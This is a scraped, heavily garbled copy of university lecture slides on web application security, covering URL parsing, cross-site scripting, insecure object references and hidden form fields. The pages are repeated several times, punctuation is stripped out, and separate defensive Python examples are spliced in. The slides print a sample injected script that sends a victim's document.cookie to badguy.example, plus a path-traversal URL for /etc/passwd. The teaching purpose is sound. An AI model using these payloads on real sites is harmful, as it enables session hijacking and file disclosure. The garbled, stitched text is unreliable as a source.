1 scheme Schemeprotocol name2 Indicator of a hierarchical URL3 loginpassword credentials to access (optional)4 address server to retrieve the data from5 port port number to connect to (optional)6 pathtoresource hierarchical Unix-style path7 query_string parameters (optional)8 fragment identifier (optional)

Parts 3-5 together are called the authority

Scheme name

scheme

A case-insensitive string ends with a colon

Officially registered names are assigned by IANA

Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9

historicalEacute eg spotify nfs soapbeep tv paparazzi

Eacute also pseudo-URL adhoc schemes in browsersEacute eg javascript about config

Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf

Hierarchical versus scheme-specific

Every hierarchical URL in the generic syntax must havethe fixed string

Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello

Idea hierarchical URLs can be parsed generically

Unfortunately

Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain

Eacute nor forbid (in practice) parsing URLS without

Consequence of under-specificationDespite motivations behind XHTML to stop bad HTML onthe web browser implementations are still (deliberately)lax to try to be friendly to buggy web pages andbug-producing developers and backward compatibility(Q Why)

For URLs which donrsquot clearly conform to the original RFCthis leads to possibly unexpected treatments that varybetween browsers

httpexamplecom

javascriptexamplecom0alert(1)

mailtouserexamplecom

Examples from The Tangled Web

Credentials

loginpassword

Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible

Eacute some browsers reject certain punctuation chars

Exercise When and when not might this be anappropriate authentication mechanism

Server address

address

RFC is quite strict

Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]

Implementations are more relaxed

Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =

http127001

Question Why is this relevant to secure web appprogramming

Server port

8080

A decimal number preceded by a colon

Usually omitted the default port number for protocolused

Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful

Question What threats might this enable

Hierarchical file path

pathtoresource

Eacute Unix-style starts with Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps

Eacute direct connection with file systemEacute resource=HTML file served by server

Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app

Question What implications does this have forreviewing the security of web apps

Query string

search=purple+bananas

Optional intended to pass arbitrary parameters toresource Commonly used syntax

name1=value1ampname2=value2

is not part of URL syntax Syntax is related to mail HTMLforms So

Eacute server may not presumeenforce query string formatEacute web applications may legally use other forms after

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Exercise Find some uses of fragments on web pagesand servers See what happens if they are sent to theserver

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw: passing unnecessary information to the client and expecting it back unmodified. Anything in a hidden field can be rewritten by the client, so here the template file and the recipient address are under the sender's control.

<form action="/cgi-bin/cgimail.exe" method="post">
<input type="hidden" name="$File$" value="templates/feedback.txt">
<input type="hidden" name="$To$" value="feedback@somesite.example">
</form>

Protecting information in server data

Sometimes the server must pass information to the client during the interaction, but must protect it.

Example: editing a wiki page

<form>
<input type="hidden" name="pagename" value="NineteenSixtiesToys">
<textarea cols="80" rows="25" name="wpText"></textarea>
</form>

Solution: add a MAC constructed with a server-side secret key, and have the server recompute and compare it when the form is submitted

<input type="hidden" name="pagemac" value="bc9faaae1e35d52f3dea9651da12cd36627b8403">

Or could encrypt the pagename.
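An HMAC over the hidden fields of the wiki form, as an added example in Python (not the wiki's code or the lecture's); it is the fix for the cgimail-style hidden fields on the previous slide as well. The server key, the session id and the list of protected field names are assumptions; the key is generated at start-up here only so the block runs stand-alone.

```python
import hashlib
import hmac
import secrets
from html import escape
from urllib.parse import urlencode

# Assumption: a random key that lives only on the server and never appears
# in any page; rotating it simply makes outstanding forms fail verification.
SERVER_KEY = secrets.token_bytes(32)

# The server, not the submission, decides which fields the MAC covers.
PROTECTED_FIELDS = ("pagename",)


def _canonical(fields, session_id):
    """Fixed-order, unambiguous serialisation of the protected fields,
    bound to the session so a MAC minted for one user cannot be replayed
    by another.  urlencode over a sorted list gives that encoding."""
    items = sorted((name, fields.get(name, "")) for name in PROTECTED_FIELDS)
    return (session_id + "|" + urlencode(items)).encode("utf-8")


def mint_mac(fields, session_id, key=SERVER_KEY):
    """Hex HMAC-SHA256 over the protected fields for this session."""
    return hmac.new(key, _canonical(fields, session_id), hashlib.sha256).hexdigest()


def render_hidden_fields(fields, session_id, key=SERVER_KEY):
    """The hidden inputs the wiki edit form carries, plus 'pagemac'.
    Values are HTML-escaped on output, the XSS rule from the previous section."""
    inputs = [
        f'<input type="hidden" name="{name}" '
        f'value="{escape(fields.get(name, ""), quote=True)}">'
        for name in PROTECTED_FIELDS
    ]
    inputs.append(
        f'<input type="hidden" name="pagemac" value="{mint_mac(fields, session_id, key)}">')
    return "\n".join(inputs)


def verify_submission(form, session_id, key=SERVER_KEY):
    """Recompute the MAC over the protected fields as they came back and
    compare in constant time.  True only if nothing covered was altered."""
    received = form.get("pagemac", "")
    if not isinstance(received, str) or not received.isascii():
        return False
    expected = mint_mac(form, session_id, key)
    return hmac.compare_digest(expected, received)
```

The MAC protects integrity only: the page name is still visible to the client, which is fine for a wiki page name and is the case where encryption would be the alternative. Binding the MAC to the session is what stops one user submitting a tag minted for another, and `compare_digest` avoids leaking how many leading bytes of a guessed tag were right.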

Other authorization mistakes

Assuming requests occur in proper order

É For an admin task (e.g. password reset), assuming that the user must have issued a GET to retrieve a form before a POST
É only checking authorization on the first step; each request must be authorized on its own, since nothing forces a client to send them in the expected order

Authorization by obscurity

É Supposing that because a web page is not linked to from the main site, only people who are given its URL will be able to reach it

http://www.myserver.com/secretarea/privatepaper.pdf

Unlinked URLs still leak, through Referer headers, proxy and server logs, browser history and forwarding, so the resource needs real access control.

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questions

URLs

É Recap the 8 components of a URL. From a server-side point of view, which of these is trustworthy? From the web app viewpoint, which of these is it most important to validate in output, to protect your users?

XSS

É Explain how session stealing works with XSS. How could a reflected XSS attack steal a session?

Object references

É Why is it important to add defence-in-depth when configuring web servers? Give three examples of ways in which a web application may be restricted by a (separate) server.

References

Some commentary and examples were taken from the texts:

É Innocent Code: a security wake-up call for web programmers, by Sverre H. Huseby, Wiley 2004

É The Tangled Web: a Guide to Securing Modern Web Applications, by Michal Zalewski, No Starch Press 2012

as well as the named RFCs.

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 8: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Hierarchical versus scheme-specific

Every hierarchical URL in the generic syntax must havethe fixed string

Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello

Idea hierarchical URLs can be parsed generically

Unfortunately

Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain

Eacute nor forbid (in practice) parsing URLS without

Consequence of under-specificationDespite motivations behind XHTML to stop bad HTML onthe web browser implementations are still (deliberately)lax to try to be friendly to buggy web pages andbug-producing developers and backward compatibility(Q Why)

For URLs which donrsquot clearly conform to the original RFCthis leads to possibly unexpected treatments that varybetween browsers

httpexamplecom

javascriptexamplecom0alert(1)

mailtouserexamplecom

Examples from The Tangled Web

Credentials

loginpassword

Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible

Eacute some browsers reject certain punctuation chars

Exercise When and when not might this be anappropriate authentication mechanism

Server address

address

RFC is quite strict

Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]

Implementations are more relaxed

Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =

http127001

Question Why is this relevant to secure web appprogramming

Server port

8080

A decimal number preceded by a colon

Usually omitted the default port number for protocolused

Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful

Question What threats might this enable

Hierarchical file path

pathtoresource

Eacute Unix-style starts with Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps

Eacute direct connection with file systemEacute resource=HTML file served by server

Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app

Question What implications does this have forreviewing the security of web apps

Query string

search=purple+bananas

Optional intended to pass arbitrary parameters toresource Commonly used syntax

name1=value1ampname2=value2

is not part of URL syntax Syntax is related to mail HTMLforms So

Eacute server may not presumeenforce query string formatEacute web applications may legally use other forms after

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Exercise Find some uses of fragments on web pagesand servers See what happens if they are sent to theserver

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUR OUTPUTS

XSS attacks in general

• Attack typically on (another) user of the web app
• Attacker tricks app into displaying malicious code
  • typically script code

Many possible aims:

• display random images, popup windows
• change page contents, e.g. alter bank account number
• session hijacking: steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script:

<script>
document.location.replace("http://www.badguy.example/steal.php"
  + "?what=" + document.cookie);
</script>

• redirects victim's browser to attacker's site, passing cookie
• might also pass currently visited web page
  • then attacker's server can issue a redirect back again

Reflected XSS

Reflected XSS occurs when injected malicious code isn't stored in the server but is immediately displayed in the visited page. Suppose

http://mymanpages.org/manpage.php?title=Man+GCC&program=gcc

dynamically makes HTML embedding title directly:

<h1>Man GCC</h1>

An attacker could use this with a malicious input

title=<script>...</script>&program=gcc

which, e.g., steals a cookie.

Exercise: Explain how this attack works in practice.

XSS Solutions

Input processing is tricky: need to understand data flow through the app (quoting, encoding, passed to/from functions, databases, etc.). Hence output filtering.

Plain output: HTML encoding

• Stored data values need to be encoded to represent in HTML (e.g. < converted to &lt;, etc.)

Marked-up output: complex filtering

• Need to work through tags in input and rule out risky ones. Scripts may appear in attributes. Flaky.

Marked-up output: DSL

• A better approach: use a dedicated syntax, convert to restricted subset of HTML.
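The "plain output: HTML encoding" solution applied to the reflected-XSS manpage example, as an added example that is not the lecture's code: the vulnerable rendering beside an encoded one, plus an attribute-context variant, since an href is a URL inside an attribute and needs both encodings. The helper names are constructed here.

```python
"""HTML-encoding on output for the reflected-XSS manpage example.

Added example (not the lecture's code): the vulnerable rendering pastes
the `title` query parameter straight into markup; the hardened version
encodes it for the context it lands in. The manpage.php URL is the one
from the lecture; the helper names are constructed here.
"""
import html
from urllib.parse import parse_qs, quote_plus, urlsplit


def title_from_url(url):
    """Extract the `title` parameter the way manpage.php would receive it."""
    params = parse_qs(urlsplit(url).query)
    return params.get("title", [""])[0]


def render_unsafe(title):
    # Vulnerable pattern from the lecture: whatever arrives in `title` is
    # emitted verbatim, so a <script> tag in the parameter becomes code.
    return f"<h1>{title}</h1>"


def render_encoded(title):
    # Plain output: encode for HTML text content so <, >, & and quotes
    # reach the browser as entities and are displayed, not parsed.
    return f"<h1>{html.escape(title, quote=True)}</h1>"


def render_attribute(program):
    # Nested contexts: the value is first URL-encoded (it is part of a query
    # string), then HTML-encoded (it sits inside a quoted attribute), and the
    # literal '&' separating parameters is written as &amp; in the attribute.
    safe = html.escape(quote_plus(program), quote=True)
    return f'<a href="manpage.php?program={safe}&amp;format=html">source</a>'
```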

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

http://research.site.ed.ac.uk/showhtml.php?title=User+Manual&file=release%2FUserman.html#Introduction

A "cool" PHP script, showhtml.php:

• take a plain HTML file
• wrap it with navigation links, site style
• convert the internal links to reference back to the wrapped version

Embarrassing PHP blunders

http://research.site.ed.ac.uk/showhtml.php?title=User+Manual&file=%2Fetc%25passwd

• remote users can visit any file on the system
• mistake motivates defence-in-depth
  • http server should not serve up any file
  • use internal web server config (separate apps)
  • and external OS config (e.g. nobody user, chroot)

Authorization and object access

What was the problem here?

• the app developer (implicitly) authorized users
  • to read documentation files he had created
  • project was open source, no need for logins
  • app contained no paths to files outside the project
  • so no explicit authorization code was written
• but PHP code didn't check the filename returned
  • showhtml.php provided access to server objects
  • input validation only checked for file existence

There should have been a re-authorization step. A well-written app should only allow access to its own resources.

Looking at anyone's bank account

<form action="show-account.asp" method="get">
Account to display:
<select name="account">
<option value="12345678901">12345678901</option>
<option value="12346543210">12346543210</option>
</select>
<input type="submit" name="show" value="Show Account">
</form>

Example from Innocent Code, based on a Norwegian newspaper story about a "17-year geek able to view anyone's bank account".

Solutions for object referencing

Re-validate:

• Check authorization again
• Obvious solution, but duplicates effort

Add a data indirection:

• Session-specific server-side array of account nos.

<option value="1">12345678901</option>
<option value="2">12346543210</option>

• Similarly for file access:

http://research.site.ed.ac.uk/showhtml.php?file=1#Introduction

For many files, a hash table or database could be used.
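The data-indirection solution as an added example that is not the lecture's code: a session-scoped table maps small indices to the objects this user may reach, the form carries only indices, and a submitted index is resolved server-side, so that a raw account number or path typed into the request resolves to nothing. The account numbers and file path are the lecture's sample values; the session handling and handler sketch are assumptions.

```python
"""Data indirection for object references.

Added example (not the lecture's code): a per-session table maps small
indices to the objects this user may reach, the form carries only the
indices, and a submitted index is resolved server-side, which is where
the authorization decision actually happens. The account numbers and
the file path are the lecture's sample values; the session handling is
a constructed assumption.
"""
import html


class IndirectionTable:
    """Session-scoped map from opaque indices to real object references."""

    def __init__(self, objects):
        # Only objects the session owner is authorised for go in here; the
        # table is built once per session from the server's own records.
        self._table = {str(i): obj for i, obj in enumerate(objects, start=1)}

    def options_html(self):
        """<option> elements whose values are indices, not account numbers."""
        return "".join(
            f'<option value="{idx}">{html.escape(obj)}</option>'
            for idx, obj in self._table.items())

    def resolve(self, submitted):
        """Map a submitted index back to the object; None if it is not in
        this session's table (unknown index, or a raw account number or
        file path sent directly instead of an index)."""
        return self._table.get(submitted)


def show_account(session_table, form):
    """Handler sketch: the account parameter is an index, never the number."""
    account = session_table.resolve(form.get("account", ""))
    if account is None:
        return "403 not your account"
    return f"200 balance for {account}"
```

The same class serves the file-access case: a table built from the project's own documentation files makes `file=1` resolve to a known path and anything else to None.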

Passing too much information

Old flaw: passing unnecessary information to the client and expecting it back unmodified.

<form action="cgi-bin/cgimail.exe" method="post">
<input type="hidden" name="$File$" value="templates/feedback.txt">
<input type="hidden" name="$To$" value="feedback@somesite.example">
</form>

Protecting information in server data

Sometimes the server must pass information to the client during the interaction, but must protect it.

Example: editing a wiki page

<form>
<input type="hidden" name="pagename" value="NineteenSixtiesToys">
<textarea cols="80" rows="25" name="wpText">
</textarea>
</form>

Solution: add a MAC constructed with a server-side secret key:

<input type="hidden" name="pagemac" value="bc9faaae1e35d52f3dea9651da12cd36627b8403">

Or could encrypt the pagename.
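The MAC-protected hidden field as an added example that is not the lecture's code: the server emits pagename together with an HMAC over it and refuses the POST if the MAC no longer matches. Binding the MAC to the session id as well goes beyond the lecture's scheme, so that a valid pagemac copied from one user's form is not accepted in another session; the key and session ids are constructed.

```python
"""MAC-protected hidden form field for the wiki-editing example.

Added example (not the lecture's code): the server keeps a secret key,
emits pagename together with an HMAC over it, and refuses the POST if
the MAC no longer matches. Binding the MAC to the session id as well is
an extension of the lecture's scheme so that a valid field cannot be
replayed by a different user; the key and session ids are constructed.
"""
import hashlib
import hmac
import html
import secrets

SERVER_KEY = secrets.token_bytes(32)   # generated at start-up, never sent to clients


def page_mac(pagename, session_id, key=SERVER_KEY):
    """Hex HMAC-SHA256 over (session id, pagename); NUL separates the fields
    so that the pair cannot be re-split into a different (id, name)."""
    msg = session_id.encode("utf-8") + b"\0" + pagename.encode("utf-8")
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def hidden_fields(pagename, session_id, key=SERVER_KEY):
    """The two hidden inputs the edit form carries."""
    return (
        f'<input type="hidden" name="pagename" value="{html.escape(pagename, quote=True)}">'
        f'<input type="hidden" name="pagemac" value="{page_mac(pagename, session_id, key)}">'
    )


def verify_edit(form, session_id, key=SERVER_KEY):
    """Return the pagename if the submitted MAC checks out, else None.

    The MAC is recomputed from what the client sent back; compare_digest
    keeps the comparison time independent of where the first mismatch is.
    """
    pagename = form.get("pagename", "")
    expected = page_mac(pagename, session_id, key).encode("ascii")
    submitted = form.get("pagemac", "").encode("utf-8")
    if not hmac.compare_digest(expected, submitted):
        return None
    return pagename
```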

Other authorization mistakes

Assuming requests occur in proper order

• For an admin task (e.g. password reset), assuming that the user must have issued a GET to retrieve a form before a POST
• only checking authorization on the first step

Authorization by obscurity

• Supposing that because a web page is not linked to the main site, only people who are given it will be able to reach it

http://www.myserver.com/secretarea/privatepaper.pdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questions

URLs

• Recap the 8 components of a URL. From a server-side point of view, which of these is trustworthy? From the web app viewpoint, which of these is it most important to validate in output to protect your users?

XSS

• Explain how session stealing works with XSS. How could a reflected XSS attack steal a session?

Object references

• Why is it important to add defence-in-depth when configuring web servers? Give three examples of ways in which a web application may be restricted by a (separate) server.

References

Some commentary and examples were taken from the texts

• Innocent Code: a security wake-up call for web programmers, by Sverre H. Huseby. Wiley, 2004.
• The Tangled Web: a Guide to Securing Modern Web Applications, by Michal Zalewski. No Starch Press, 2012.

as well as the named RFCs.

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 9: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Consequence of under-specificationDespite motivations behind XHTML to stop bad HTML onthe web browser implementations are still (deliberately)lax to try to be friendly to buggy web pages andbug-producing developers and backward compatibility(Q Why)

For URLs which donrsquot clearly conform to the original RFCthis leads to possibly unexpected treatments that varybetween browsers

httpexamplecom

javascriptexamplecom0alert(1)

mailtouserexamplecom

Examples from The Tangled Web

Credentials

loginpassword

Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible

Eacute some browsers reject certain punctuation chars

Exercise When and when not might this be anappropriate authentication mechanism

Server address

address

RFC is quite strict

Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]

Implementations are more relaxed

Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =

http127001

Question Why is this relevant to secure web appprogramming

Server port

8080

A decimal number preceded by a colon

Usually omitted the default port number for protocolused

Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful

Question What threats might this enable

Hierarchical file path

pathtoresource

Eacute Unix-style starts with Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps

Eacute direct connection with file systemEacute resource=HTML file served by server

Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app

Question What implications does this have forreviewing the security of web apps

Query string

search=purple+bananas

Optional intended to pass arbitrary parameters toresource Commonly used syntax

name1=value1ampname2=value2

is not part of URL syntax Syntax is related to mail HTMLforms So

Eacute server may not presumeenforce query string formatEacute web applications may legally use other forms after

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Exercise Find some uses of fragments on web pagesand servers See what happens if they are sent to theserver

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

